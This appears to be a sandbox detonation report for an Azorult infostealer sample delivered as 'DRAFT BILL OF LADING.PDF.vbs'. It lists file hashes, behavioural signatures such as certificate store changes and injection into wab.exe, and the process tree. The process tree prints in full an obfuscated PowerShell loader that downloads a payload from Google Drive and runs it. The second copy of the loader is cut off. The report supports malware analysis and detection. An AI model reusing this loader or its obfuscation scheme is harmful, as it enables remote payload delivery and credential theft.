\Users\Admin\AppData\Local\Temp\99E8C950\api-ms-win-crt-time-l1-1-0.dll
| MD5 | 849f2c3ebf1fcba33d16153692d5810f |
| SHA1 | 1f8eda52d31512ebfdd546be60990b95c8e28bfb |
| SHA256 | 69885fd581641b4a680846f93c2dd21e5dd8e3ba37409783bc5b3160a919cb5d |
| SHA512 | 44dc4200a653363c9a1cb2bdd3da5f371f7d1fb644d1ce2ff5fe57d939b35130ac8ae27a3f07b82b3428233f07f974628027b0e6b6f70f7b2a8d259be95222f5 |
\Users\Admin\AppData\Local\Temp\99E8C950\api-ms-win-crt-multibyte-l1-1-0.dll
| MD5 | 35fc66bd813d0f126883e695664e7b83 |
| SHA1 | 2fd63c18cc5dc4defc7ea82f421050e668f68548 |
| SHA256 | 66abf3a1147751c95689f5bc6a259e55281ec3d06d3332dd0ba464effa716735 |
| SHA512 | 65f8397de5c48d3df8ad79baf46c1d3a0761f727e918ae63612ea37d96adf16cc76d70d454a599f37f9ba9b4e2e38ebc845df4c74fc1e1131720fd0dcb881431 |
\Users\Admin\AppData\Local\Temp\99E8C950\api-ms-win-crt-math-l1-1-0.dll
| MD5 | 8b0ba750e7b15300482ce6c961a932f0 |
| SHA1 | 71a2f5d76d23e48cef8f258eaad63e586cfc0e19 |
| SHA256 | bece7bab83a5d0ec5c35f0841cbbf413e01ac878550fbdb34816ed55185dcfed |
| SHA512 | fb646cdcdb462a347ed843312418f037f3212b2481f3897a16c22446824149ee96eb4a4b47a903ca27b1f4d7a352605d4930df73092c380e3d4d77ce4e972c5a |
\Users\Admin\AppData\Local\Temp\99E8C950\api-ms-win-crt-locale-l1-1-0.dll
| MD5 | a2f2258c32e3ba9abf9e9e38ef7da8c9 |
| SHA1 | 116846ca871114b7c54148ab2d968f364da6142f |
| SHA256 | 565a2eec5449eeeed68b430f2e9b92507f979174f9c9a71d0c36d58b96051c33 |
| SHA512 | e98cbc8d958e604effa614a3964b3d66b6fc646bdca9aa679ea5e4eb92ec0497b91485a40742f3471f4ff10de83122331699edc56a50f06ae86f21fad70953fe |
\Users\Admin\AppData\Local\Temp\99E8C950\api-ms-win-crt-convert-l1-1-0.dll
| MD5 | 72e28c902cd947f9a3425b19ac5a64bd |
| SHA1 | 9b97f7a43d43cb0f1b87fc75fef7d9eeea11e6f7 |
| SHA256 | 3cc1377d495260c380e8d225e5ee889cbb2ed22e79862d4278cfa898e58e44d1 |
| SHA512 | 58ab6fedce2f8ee0970894273886cb20b10d92979b21cda97ae0c41d0676cc0cd90691c58b223bce5f338e0718d1716e6ce59a106901fe9706f85c3acf7855ff |
\Users\Admin\AppData\Local\Temp\99E8C950\api-ms-win-crt-stdio-l1-1-0.dll
| MD5 | fefb98394cb9ef4368da798deab00e21 |
| SHA1 | 316d86926b558c9f3f6133739c1a8477b9e60740 |
| SHA256 | b1e702b840aebe2e9244cd41512d158a43e6e9516cd2015a84eb962fa3ff0df7 |
| SHA512 | 57476fe9b546e4cafb1ef4fd1cbd757385ba2d445d1785987afb46298acbe4b05266a0c4325868bc4245c2f41e7e2553585bfb5c70910e687f57dac6a8e911e8 |
\Users\Admin\AppData\Local\Temp\99E8C950\api-ms-win-crt-heap-l1-1-0.dll
| MD5 | 93d3da06bf894f4fa21007bee06b5e7d |
| SHA1 | 1e47230a7ebcfaf643087a1929a385e0d554ad15 |
| SHA256 | f5cf623ba14b017af4aec6c15eee446c647ab6d2a5dee9d6975adc69994a113d |
| SHA512 | 72bd6d46a464de74a8dac4c346c52d068116910587b1c7b97978df888925216958ce77be1ae049c3dccf5bf3fffb21bc41a0ac329622bc9bbc190df63abb25c6 |
\Users\Admin\AppData\Local\Temp\99E8C950\api-ms-win-crt-string-l1-1-0.dll
| MD5 | 404604cd100a1e60dfdaf6ecf5ba14c0 |
| SHA1 | 58469835ab4b916927b3cabf54aee4f380ff6748 |
| SHA256 | 73cc56f20268bfb329ccd891822e2e70dd70fe21fc7101deb3fa30c34a08450c |
| SHA512 | da024ccb50d4a2a5355b7712ba896df850cee57aa4ada33aad0bae6960bcd1e5e3cee9488371ab6e19a2073508fbb3f0b257382713a31bc0947a4bf1f7a20be4 |
\Users\Admin\AppData\Local\Temp\99E8C950\api-ms-win-crt-runtime-l1-1-0.dll
| MD5 | 41a348f9bedc8681fb30fa78e45edb24 |
| SHA1 | 66e76c0574a549f293323dd6f863a8a5b54f3f9b |
| SHA256 | c9bbc07a033bab6a828ecc30648b501121586f6f53346b1cd0649d7b648ea60b |
| SHA512 | 8c2cb53ccf9719de87ee65ed2e1947e266ec7e8343246def6429c6df0dc514079f5171acd1aa637276256c607f1063144494b992d4635b01e09ddea6f5eef204 |
\Users\Admin\AppData\Local\Temp\99E8C950\vcruntime140.dll
| MD5 | 7587bf9cb4147022cd5681b015183046 |
| SHA1 | f2106306a8f6f0da5afb7fc765cfa0757ad5a628 |
| SHA256 | c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d |
| SHA512 | 0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f |
memory/1420-273-0x0000000077740000-0x00000000778E9000-memory.dmp
memory/1420-322-0x00000000003C0000-0x0000000001422000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2024-03-12 07:14
Reported
2024-03-12 07:16
Platform
win10v2004-20240226-en
Max time kernel
149s
Max time network
142s
Command Line
Signatures
Azorult
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1904519900-954640453-4250331663-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\WScript.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
| N/A | drive.google.com | N/A | N/A |
Suspicious use of NtCreateThreadExHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\windows mail\wab.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2624 set thread context of 4300 | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | C:\Program Files (x86)\windows mail\wab.exe |
Enumerates physical storage devices
Modifies system certificate store
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\07E032E020B72C3F192F0628A2593A19A70F069E | C:\Windows\System32\WScript.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\07E032E020B72C3F192F0628A2593A19A70F069E\Blob = 0f0000000100000014000000a8569ccd21ef9cc5737c7a12df608c2cbc545df153000000010000006500000030633021060b2a84680186f6770205010130123010060a2b0601040182373c0101030200c03021060b2a84680186f6770205010730123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080b0000000100000034000000430065007200740075006d002000540072007500730074006500640020004e006500740077006f0072006b0020004300410000006200000001000000200000005c58468d55f58e497e743982d2b50010b6d165374acf83a7d4a32db768c4408e1400000001000000140000000876cdcb07ff24f6c5cdedbb90bce284374675f71d0000000100000010000000e3f9af952c6df2aaa41706a77a44c20303000000010000001400000007e032e020b72c3f192f0628a2593a19a70f069e2000000001000000bf030000308203bb308202a3a00302010202030444c0300d06092a864886f70d0101050500307e310b300906035504061302504c31223020060355040a1319556e697a65746f20546563686e6f6c6f6769657320532e412e31273025060355040b131e43657274756d2043657274696669636174696f6e20417574686f72697479312230200603550403131943657274756d2054727573746564204e6574776f726b204341301e170d3038313032323132303733375a170d3239313233313132303733375a307e310b300906035504061302504c31223020060355040a1319556e697a65746f20546563686e6f6c6f6769657320532e412e31273025060355040b131e43657274756d2043657274696669636174696f6e20417574686f72697479312230200603550403131943657274756d2054727573746564204e6574776f726b20434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e3fb7da372bac2f0c91487f56b014ee16e4007ba6d275d7ff75b2db35ac7515faba432a66187b66e0f86d2300297f8d76957a118395d6a6479c60159ac3c314a387cd204d24b28e8205f3b07a2cc4d73dbf3ae4fc756d55aa79689faf3ab68d423865927cf0927bcac6e72831c3072dfe0a2e9d2e1747519bd2a9e7b1554041bd74339ad5528c5e21abbf4c0e4ae384933cc76859f3945d2a49ef2128c51f87ce42d7ff5ac5feb169fb12dd1bacc9142774c25c990386fdbf0ccfb8e1e97593ed5604ee60528ed4979134bba48db2ff972d339cafe1fd83472f5b440cf3101c3ecde112d175d1fb850d15e19a769de073328ca5095f9a754cb54865045a9f9490203010001a3423040300f0603551d130101ff040530030101ff301d0603551d0e041604140876cdcb07ff24f6c5cdedbb90bce284374675f7300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100a6a8ad22ce013da6a3ff62d0489d8b5e72b07844e3dc1caf09fd2348fabd2ac4b95504b510a38d27de0b8263d0eede0c3779415b22b2b09a415ca670e0d4d077cb23d300e06c562fe1690d0dd9aabf218150d906a5a8ff9537d0aafee2b3f5992d45848ae54209d774022ff789d899e9bc27d4478dba0d461c77cf14a41cb9a431c49c28740334ff331926a5e90d74b73e97c676e82796a366dde1aef2415bca9856837370e4861ad23141ba2fbe2d135a766f4ee84e810e3f5b0322a012be6658114acb03c4b42a2a2d9617e03954bc48d376279d9a2d06a6c9ec39d2abdb9f9a0b27023529b14095e7f9e89c55881946d6b734f57ece399ad938f151f74f2c | C:\Windows\System32\WScript.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\07E032E020B72C3F192F0628A2593A19A70F069E\Blob = 040000000100000010000000d5e98140c51869fc462c8975620faa780f0000000100000014000000a8569ccd21ef9cc5737c7a12df608c2cbc545df153000000010000006500000030633021060b2a84680186f6770205010130123010060a2b0601040182373c0101030200c03021060b2a84680186f6770205010730123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080b0000000100000034000000430065007200740075006d002000540072007500730074006500640020004e006500740077006f0072006b0020004300410000006200000001000000200000005c58468d55f58e497e743982d2b50010b6d165374acf83a7d4a32db768c4408e1400000001000000140000000876cdcb07ff24f6c5cdedbb90bce284374675f71d0000000100000010000000e3f9af952c6df2aaa41706a77a44c20303000000010000001400000007e032e020b72c3f192f0628a2593a19a70f069e1900000001000000100000001f7e750b566b128ac0b8d6576d2a70a52000000001000000bf030000308203bb308202a3a00302010202030444c0300d06092a864886f70d0101050500307e310b300906035504061302504c31223020060355040a1319556e697a65746f20546563686e6f6c6f6769657320532e412e31273025060355040b131e43657274756d2043657274696669636174696f6e20417574686f72697479312230200603550403131943657274756d2054727573746564204e6574776f726b204341301e170d3038313032323132303733375a170d3239313233313132303733375a307e310b300906035504061302504c31223020060355040a1319556e697a65746f20546563686e6f6c6f6769657320532e412e31273025060355040b131e43657274756d2043657274696669636174696f6e20417574686f72697479312230200603550403131943657274756d2054727573746564204e6574776f726b20434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e3fb7da372bac2f0c91487f56b014ee16e4007ba6d275d7ff75b2db35ac7515faba432a66187b66e0f86d2300297f8d76957a118395d6a6479c60159ac3c314a387cd204d24b28e8205f3b07a2cc4d73dbf3ae4fc756d55aa79689faf3ab68d423865927cf0927bcac6e72831c3072dfe0a2e9d2e1747519bd2a9e7b1554041bd74339ad5528c5e21abbf4c0e4ae384933cc76859f3945d2a49ef2128c51f87ce42d7ff5ac5feb169fb12dd1bacc9142774c25c990386fdbf0ccfb8e1e97593ed5604ee60528ed4979134bba48db2ff972d339cafe1fd83472f5b440cf3101c3ecde112d175d1fb850d15e19a769de073328ca5095f9a754cb54865045a9f9490203010001a3423040300f0603551d130101ff040530030101ff301d0603551d0e041604140876cdcb07ff24f6c5cdedbb90bce284374675f7300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100a6a8ad22ce013da6a3ff62d0489d8b5e72b07844e3dc1caf09fd2348fabd2ac4b95504b510a38d27de0b8263d0eede0c3779415b22b2b09a415ca670e0d4d077cb23d300e06c562fe1690d0dd9aabf218150d906a5a8ff9537d0aafee2b3f5992d45848ae54209d774022ff789d899e9bc27d4478dba0d461c77cf14a41cb9a431c49c28740334ff331926a5e90d74b73e97c676e82796a366dde1aef2415bca9856837370e4861ad23141ba2fbe2d135a766f4ee84e810e3f5b0322a012be6658114acb03c4b42a2a2d9617e03954bc48d376279d9a2d06a6c9ec39d2abdb9f9a0b27023529b14095e7f9e89c55881946d6b734f57ece399ad938f151f74f2c | C:\Windows\System32\WScript.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\07E032E020B72C3F192F0628A2593A19A70F069E\Blob = 5c0000000100000004000000000800001900000001000000100000001f7e750b566b128ac0b8d6576d2a70a503000000010000001400000007e032e020b72c3f192f0628a2593a19a70f069e1d0000000100000010000000e3f9af952c6df2aaa41706a77a44c2031400000001000000140000000876cdcb07ff24f6c5cdedbb90bce284374675f76200000001000000200000005c58468d55f58e497e743982d2b50010b6d165374acf83a7d4a32db768c4408e0b0000000100000034000000430065007200740075006d002000540072007500730074006500640020004e006500740077006f0072006b002000430041000000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000006500000030633021060b2a84680186f6770205010130123010060a2b0601040182373c0101030200c03021060b2a84680186f6770205010730123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000a8569ccd21ef9cc5737c7a12df608c2cbc545df1040000000100000010000000d5e98140c51869fc462c8975620faa782000000001000000bf030000308203bb308202a3a00302010202030444c0300d06092a864886f70d0101050500307e310b300906035504061302504c31223020060355040a1319556e697a65746f20546563686e6f6c6f6769657320532e412e31273025060355040b131e43657274756d2043657274696669636174696f6e20417574686f72697479312230200603550403131943657274756d2054727573746564204e6574776f726b204341301e170d3038313032323132303733375a170d3239313233313132303733375a307e310b300906035504061302504c31223020060355040a1319556e697a65746f20546563686e6f6c6f6769657320532e412e31273025060355040b131e43657274756d2043657274696669636174696f6e20417574686f72697479312230200603550403131943657274756d2054727573746564204e6574776f726b20434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e3fb7da372bac2f0c91487f56b014ee16e4007ba6d275d7ff75b2db35ac7515faba432a66187b66e0f86d2300297f8d76957a118395d6a6479c60159ac3c314a387cd204d24b28e8205f3b07a2cc4d73dbf3ae4fc756d55aa79689faf3ab68d423865927cf0927bcac6e72831c3072dfe0a2e9d2e1747519bd2a9e7b1554041bd74339ad5528c5e21abbf4c0e4ae384933cc76859f3945d2a49ef2128c51f87ce42d7ff5ac5feb169fb12dd1bacc9142774c25c990386fdbf0ccfb8e1e97593ed5604ee60528ed4979134bba48db2ff972d339cafe1fd83472f5b440cf3101c3ecde112d175d1fb850d15e19a769de073328ca5095f9a754cb54865045a9f9490203010001a3423040300f0603551d130101ff040530030101ff301d0603551d0e041604140876cdcb07ff24f6c5cdedbb90bce284374675f7300e0603551d0f0101ff040403020106300d06092a864886f70d01010505000382010100a6a8ad22ce013da6a3ff62d0489d8b5e72b07844e3dc1caf09fd2348fabd2ac4b95504b510a38d27de0b8263d0eede0c3779415b22b2b09a415ca670e0d4d077cb23d300e06c562fe1690d0dd9aabf218150d906a5a8ff9537d0aafee2b3f5992d45848ae54209d774022ff789d899e9bc27d4478dba0d461c77cf14a41cb9a431c49c28740334ff331926a5e90d74b73e97c676e82796a366dde1aef2415bca9856837370e4861ad23141ba2fbe2d135a766f4ee84e810e3f5b0322a012be6658114acb03c4b42a2a2d9617e03954bc48d376279d9a2d06a6c9ec39d2abdb9f9a0b27023529b14095e7f9e89c55881946d6b734f57ece399ad938f151f74f2c | C:\Windows\System32\WScript.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\DRAFT BILL OF LADING.PDF.vbs"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Opposability='Reappreciation:\Hovedjgernes';Set-Content $Opposability 'Lrerkollegier';$Capistrate81=Test-Path $Opposability;if($Capistrate81){exit};function cangler ($Tankest){For($Vgtafgiften=4; $Vgtafgiften -lt $Tankest.Length-1; $Vgtafgiften+=5){$besudles=$besudles+$Tankest.'Substring'($Vgtafgiften, 1)};$besudles;}$Danbo=cangler ' venh Sdmt U.tt BurpCorasVene:Plan/ an/ Keid P.lr.igliPar.vIdeaeNica. .rug UntoEnfoo DetgGn,tlSuq eEpig.,legc DifoSkakm bse/NonsuForncAar,?Del,e,itcx VinpHvalo enr VittShea=Kol.dBlinoS,pewMultnKlasl SoioWisda credTop.&.elsi ProdB,se=tyg.1geocKstudVsunlSArthE VisKStikQStedOKejs0 Nato IncwCamagBekrG non0MoskzCompQ TroBTran7L.ekPHi,tqParajHe.rPtrkubChasAUnderUnfuN DowACharcLbes0 UncckultZProdUFlyvclnre ';$Fastlaast=cangler 'Pat,iJuleeR,ffxGa.g ';$Arbejdsrutinen = cangler ' Ans\ strs Bray,orrsBihew Ocho kytwSrbo6Stan4Clea\ T,rWStreiChoknSni,d acaoRadiwQat,sDi.oPKaleoHjerwEnnee aitrM niSIndbhBegye stolEftelP,pi\ ArsvOp,i1.kra. Ask0Fimr\Syrap en oM,liwAfgaeSt drRetssfolkh MoueBagglMe.il,ans.LdgaeUdspx No.eE.tr ';&($Fastlaast) (cangler 'Unim$ TypGBl kbPt raskrmkNonrkskrae ibonChri=Trop$ Sowe Infn.annv por:hallw CroiRen.nEma,dCrowiEncarha.n ') ;&($Fastlaast) (cangler ' Rid$ .ecASprir iltbC.nteSkn,jEk adGon sTradrFyldu ThatZiggi D,un S ieIntenSom.= esp$Ar.lG E.mbC,ataRa.ckEftekUsneeSonnnEnga+Chry$ S fAun,ermestb.elfeFootj MotdEbensC,lorSakru,jertk ali ,sknF,dneG ngn agn ') ;&($Fastlaast) (cangler 'Phot$ DisUIn knEksprMoiduA anpInsht R,duAnser Hjse J.edRo,i Geo =Stor R.di( Upp(Syfig TegwEthymRepoi.rif EufowConvi Udtn Zin3S.bm2afla_Fo.sp lar NyeoGeofcDilee L.ssTitasDip Indb-oberFFnom nreP K.nrC,nto Fdsc S.ieAlabsOpdasArmmI De,dBl,w=Vest$Stan{StadP ,leIKontDTakt} Del)Budd. rfsCNucao AudmFortmWkpraStern Sled B bL EvoiDrmmnSbehe Est)Skru S.il- FussTurbp KallOrkeiOrakt Sin Ef,[IcelcOmgah Dr aBifurApos]Blgc3 ost4Preb ');&($Fastlaast) (cangler 'Bi,l$B,ngAVower ModrUblooSs eg KalaDokutF leeQuar Spal=Ytta Pala$ DauU.egnnNatirBeneuSuccpUvirtD duu C.mrAarveFokud Psy[Brdr$ WalUunconTheorEr nuPt.rpTauttMoniuMindrObl.eNat dKvar. S ocUregoPreluAlpen Op tPe.i-Beko2Ov.r]Ches ');&($Fastlaast) (cangler 'Li h$Av,uLTe ma PhagBegreBiodrR.fifPneuoCr wrKvr,vLdgaa G nlFrugt Ovee UnirSkornSe aeVver=P ec(UndeTArs.e,horsskritSkem-RevaPLo iarevatXa thSynt Dist$RetaAProlrUdkmb Afve BanjAgardD.mbsHygrrE.ekuIndutJ.uriTrannVolteChonnSols)Ac,d Cho.-ProfA BrunFeltdChlo Rek(Bil,[.irmI.ungnStatt UfePAnaltManirAllo]Ch o:u.li:Grots L.eipartzProue Op. Inco-H,geeAn.oqPasc ,tri8Spl ) Spa ') ;if ($Lagerforvalterne) {&$Arbejdsrutinen $Arrogate;} else {;$Seawalls=cangler 'S,ndSH.motFortaQuadr UnctFler- T.mBKiteiLbskt usys.ektT UnarOscua,phinBukksCharf.nexeSkycrPals Lig -Ca,iSAdv,oTe,euOptirre,acFoure Pat Re,r$ecthDShugaHighnAmarbStagoH.ra T.mm- ActD ,ereSubss,ackt Sthikunon oniaF sktSo,diAnneogoodnEadi tilo$Al fG OvebImdeaSubskPrurkStereP ysn Dia ';&($Fastlaast) (cangler 'Daug$y.chGProtb ResaEn,okAntik ordeYog.nCh r=Aggl$,ypeeS.ednPri,vUnde:SociaConcpni spO sidSod,a tilt Upca Mus ') ;&($Fastlaast) (cangler 'AdviIIldlmUndep .utoB sgrO.lot The-MestMspi,oExotdSitauCarbl UnpeLath Co eB IndiAvi,tReprs Le,T .urr ubaDilenNeursSun,fAlaneB.lyrProt ') ;$Gbakken=$Gbakken+'\Arboureous.Whi';while (-not $Konversatietonsleksika) {&($Fastlaast) (cangler 'Stje$RejsKOscuoUnnenpolyvPat,eAtomrSabesJudia RehtHos iGineeappltForboIchtnPeris PerlBalle KrikLimos.adeiCordkSpilaGang=Do,s(UnsyTBoateScr sStortStou-,uggP FllaUbentKivehDomi B,o$SkabGKranb,aska ,rakHetekUs.seCentnCinc)Non, ') ;&($Fastlaast) $Seawalls;&($Fastlaast) (cangler 'TeleS evitRec,aHoerrAd itProc-ArguSBe,rlToveeF,gteFin.pAstr Excu5Hjti ');}&($Fastlaast) (cangler 'Squi$solbU FlanImbee arjxphartCr crM,shaCeravTiltaMyofgchona Tranvejrt evnlt,icy Wit P ov=Alau IlanGMarkeUntrtK,mm-NonzCEmuloBaadnUnsetL.pieTwisnNarrtRyde Fri,$An.lGdashbTu.taawe,k Glok peke trin Par ');&($Fastlaast) (cangler 'B.gg$TovfGS.ksa,ibifstalfSecrk Kony SataAsp.8H st4Sote euk=Fuld Har[Hi.pSArr,yTortsSn gtAfspeIr.emSbeu. Sj,C.lidoKohon Arav KipeB.ndr D ctUfor]Skaa:Knud: CypF EtyrUvurooverm upeB oua SttsIndveEnvi6 ili4RestSBrustUnprrBenhi Nonn.itog ,ke(Ane.$NocuUSolinsw,eeFriaxTetrtNoner.rosaB.pyvThe,a icgFo,oaColln G,ntArm.lPauly iss)Nokt ');&($Fastlaast) (cangler 'Scr,$R,teMPoseu kali ersr ArcbBroauEnvir.endnT an Resu= ato Col,[PrivSA.asyFalls SvmtTrameBailmF ag.Dr.gTTer.e TroxElastbleg. UryEPr enM,crc su,oPropdFngsiCompnIsotghumi] .in:Hugg:TripAvandSRombC,xymISascIHind.OptaGWeskeTitetTeknS.ejrtUnblrDiagiP ysnSadegAlmu(Citr$ InaG LapaForkfKrsef Chik estyFrogaFrik8Rows4 ,ab)Podd ');&($Fastlaast) (cangler ' Fl,$circSMilikReklnFlawhlatte DisdCheksPantpFreml BygeCountmisatDe,re Ldin imb=Fors$MythM ,ypuEctoim.dsrernabAstruToplrSvinnKonk.ReplsJagluWas.bUdt s A.ptFascr Prgi .atnCr.pgMyog(No.k3Atte2 Tit0 Uns7Diss0Burt9Asci, Ove3 Afl9Komm3Impe2Re,i3De,e) Enf ');&($Fastlaast) $Sknhedspletten;}"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Opposability='Reappreciation:\Hovedjgernes';Set-Content $Opposability 'Lrerkollegier';$Capistrate81=Test-Path $Opposability;if($Capistrate81){exit};function cangler ($Tankest){For($Vgtafgiften=4; $Vgtafgiften -lt $Tankest.Length-1; $Vgtafgiften+=5){$besudles=$besudles+$Tankest.'Substring'($Vgtafgiften, 1)};$besudles;}$Danbo=cangler ' venh Sdmt U.tt BurpCorasVene:Plan/ an/ Keid P.lr.igliPar.vIdeaeNica. .rug UntoEnfoo DetgGn,tlSuq eEpig.,legc DifoSkakm bse/NonsuForncAar,?Del,e,itcx VinpHvalo enr VittShea=Kol.dBlinoS,pewMultnKlasl SoioWisda credTop.&.elsi ProdB,se=tyg.1geocKstudVsunlSArthE VisKStikQStedOKejs0 Nato IncwCamagBekrG non0MoskzCompQ TroBTran7L.ekPHi,tqParajHe.rPtrkubChasAUnderUnfuN DowACharcLbes0 UncckultZProdUFlyvclnre ';$Fastlaast=cangler 'Pat,iJuleeR,ffxGa.g ';$Arbejdsrutinen = cangler ' Ans\ strs Bray,orrsBihew Ocho kytwSrbo6Stan4Clea\ T,rWStreiChoknSni,d acaoRadiwQat,sDi.oPKaleoHjerwEnnee aitrM niSIndbhBegye stolEftelP,pi\ ArsvOp,i1.kra. Ask0Fimr\Syrap en oM,liwAfgaeSt drRetssfolkh MoueBagglMe.il,ans.LdgaeUdspx No.eE.tr ';&($Fastlaast) (cangler 'Unim$ TypGBl kbPt raskrmkNonrkskrae ibonChri=Trop$ Sowe Infn.annv por:hallw CroiRen.nEma,dCrowiEncarha.n ') ;&($Fastlaast) (cangler ' Rid$ .ecASprir iltbC.nteSkn,jEk adGon sTradrFyldu ThatZiggi D,un S ieIntenSom.= esp$Ar.lG E.mbC,ataRa.ckEftekUsneeSonnnEnga+Chry$ S fAun,ermestb.elfeFootj MotdEbensC,lorSakru,jertk ali ,sknF,dneG ngn agn ') ;&($Fastlaast) (cangler 'Phot$ DisUIn knEksprMoiduA anpInsht R,duAnser Hjse J.edRo,i Geo =Stor R.di( Upp(Syfig TegwEthymRepoi.rif EufowConvi Udtn Zin3S.bm2afla_Fo.sp lar NyeoGeofcDilee L.ssTitasDip Indb-oberFFnom nreP K.nrC,nto Fdsc S.ieAlabsOpdasArmmI De,dBl,w=Vest$Stan{StadP ,leIKontDTakt} Del)Budd. rfsCNucao AudmFortmWkpraStern Sled B bL EvoiDrmmnSbehe Est)Skru S.il- FussTurbp KallOrkeiOrakt Sin Ef,[IcelcOmgah Dr aBifurApos]Blgc3 ost4Preb ');&($Fastlaast) (cangler 'Bi,l$B,ngAVower ModrUblooSs eg KalaDokutF leeQuar Spal=Ytta Pala$ DauU.egnnNatirBeneuSuccpUvirtD duu C.mrAarveFokud Psy[Brdr$ WalUunconTheorEr nuPt.rpTauttMoniuMindrObl.eNat dKvar. S ocUregoPreluAlpen Op tPe.i-Beko2Ov.r]Ches ');&($Fastlaast) (cangler 'Li h$Av,uLTe ma PhagBegreBiodrR.fifPneuoCr wrKvr,vLdgaa G nlFrugt Ovee UnirSkornSe aeVver=P ec(UndeTArs.e,horsskritSkem-RevaPLo iarevatXa thSynt Dist$RetaAProlrUdkmb Afve BanjAgardD.mbsHygrrE.ekuIndutJ.uriTrannVolteChonnSols)Ac,d Cho.-ProfA BrunFeltdChlo Rek(Bil,[.irmI.ungnStatt UfePAnaltManirAllo]Ch o:u.li:Grots L.eipartzProue Op. Inco-H,geeAn.oqPasc ,tri8Spl ) Spa ') ;if ($Lagerforvalterne) {&$Arbejdsrutinen $Arrogate;} else {;$Seawalls=cangler 'S,ndSH.motFortaQuadr UnctFler- T.mBKiteiLbskt usys.ektT UnarOscua,phinBukksCharf.nexeSkycrPals Lig -Ca,iSAdv,oTe,euOptirre,acFoure Pat Re,r$ecthDShugaHighnAmarbStagoH.ra T.mm- ActD ,ereSubss,ackt Sthikunon oniaF sktSo,diAnneogoodnEadi tilo$Al fG OvebImdeaSubskPrurkStereP ysn Dia ';&($Fastlaast) (cangler 'Daug$y.chGProtb ResaEn,okAntik ordeYog.nCh r=Aggl$,ypeeS.ednPri,vUnde:SociaConcpni spO sidSod,a tilt Upca Mus ') ;&($Fastlaast) (cangler 'AdviIIldlmUndep .utoB sgrO.lot The-MestMspi,oExotdSitauCarbl UnpeLath Co eB IndiAvi,tReprs Le,T .urr ubaDilenNeursSun,fAlaneB.lyrProt ') ;$Gbakken=$Gbakken+'\Arboureous.Whi';while (-not $Konversatietonsleksika) {&($Fastlaast) (cangler 'Stje$RejsKOscuoUnnenpolyvPat,eAtomrSabesJudia RehtHos iGineeappltForboIchtnPeris PerlBalle KrikLimos.adeiCordkSpilaGang=Do,s(UnsyTBoateScr sStortStou-,uggP FllaUbentKivehDomi B,o$SkabGKranb,aska ,rakHetekUs.seCentnCinc)Non, ') ;&($Fastlaast) 